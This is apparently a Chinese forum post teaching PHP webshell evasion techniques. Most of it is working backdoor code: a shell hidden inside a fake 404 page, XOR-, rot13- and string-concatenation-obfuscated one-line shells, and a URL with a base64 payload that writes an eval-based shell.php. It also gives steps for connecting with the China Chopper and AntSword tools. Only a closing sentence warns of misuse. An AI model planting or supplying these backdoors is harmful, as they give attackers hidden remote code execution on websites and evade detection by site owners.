PHP WebShell 免杀技巧与实战

404页面隐藏木马技巧

404页面是网站中常见但通常被忽略的文件之一。很少有人会对其进行检查或修改,这为隐藏后门提供了一个良好的机会。

<code><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?></code>

直接访问时会显示自定义的404友好提示:

图片[1]-PHP WebShell 免杀技巧与实战-山海云端论坛

以下是使用蚁剑进行连接的步骤,需要在链接时添加body参数,并设置请求信息中的body参数:

图片[2]-PHP WebShell 免杀技巧与实战-山海云端论坛

数据拼接PHP后门

<code><?php $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']); ?></code>

使用菜刀进行连接即可,密码为”assert”。

图片[3]-PHP WebShell 免杀技巧与实战-山海云端论坛

可变变量PHP后门

<code><?php $_GET[a]($_GET[b]);?></code>

通过浏览器访问以下链接:

<code>http://192.168.174.159:82/webshell/get.php?a=assert&b=${fputs(fopen(base64_decode('c2hlbGwucGhw'), 'w'), base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjJ10pOyA/Pg=='))};</code>

这将在网站目录下生成一个名为shell.php的文件。随后,使用蚁剑链接即可。

可变变量木马变形

<code><?php ($_=@$_GET[2]).@$_($_POST[1])?></code>

在菜刀中使用以下链接:

<code>http://site/shell.php?2=assert&1=phpinfo();</code>

异或运算PHP后门

<code><?php @$_++; $__=("`"^"?").(":"^"}").("%"^"`").("{"^"/"); $___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|"); ${$__}[!$_](${$___}[$_]); ?></code>

构造一句话木马,将“0”当成参数,赋值为“assert”,然后使用菜刀工具连接即可。

rot13构造PHP木马

<code><?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); ?></code>

关键名称拼接木马

<code><?php error_reporting(0); $g = array('','s'); $gg = a.$g[1].ser.chr('116'); @$gg($_POST[get]); ?></code>

最短的一句话木马

<code><?=`$_GET[1]`;</code>

以上是一些利用404页面和不同PHP技巧隐藏后门的方法,通过这些方法,攻击者可以在网站上植入木马而不易被发现。

这篇文章介绍了利用404页面和多种PHP技巧隐藏后门的方法,以及如何在网站上植入木马而不易被发现。这些技术可能被黑客用于恶意目的,请务必保持网站安全,并定期检查和更新防御措施。

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容